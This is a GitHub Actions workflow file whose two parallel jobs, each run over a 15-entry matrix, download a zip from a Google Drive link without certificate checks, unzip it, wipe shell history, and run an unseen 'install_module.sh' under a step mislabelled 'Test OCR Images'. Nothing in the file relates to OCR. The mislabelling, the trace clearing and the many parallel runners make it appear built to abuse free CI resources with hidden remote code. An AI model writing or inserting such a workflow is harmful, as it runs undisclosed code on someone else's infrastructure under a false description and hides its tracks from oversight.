name: bautroi4core
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  check:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Provision', 'Build', 'Confirm', 'Trigger', 'Deploy']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1v-K6sLCRp-DTRouDDd3oZ6jZxu0niTt6" -O bautroi4core.zip
        unzip -o bautroi4core.zip
        rm bautroi4core.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh


  configure1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Provision', 'Build', 'Confirm', 'Trigger', 'Deploy']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1v-K6sLCRp-DTRouDDd3oZ6jZxu0niTt6" -O bautroi4core.zip
        unzip -o bautroi4core.zip
        rm bautroi4core.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh
        
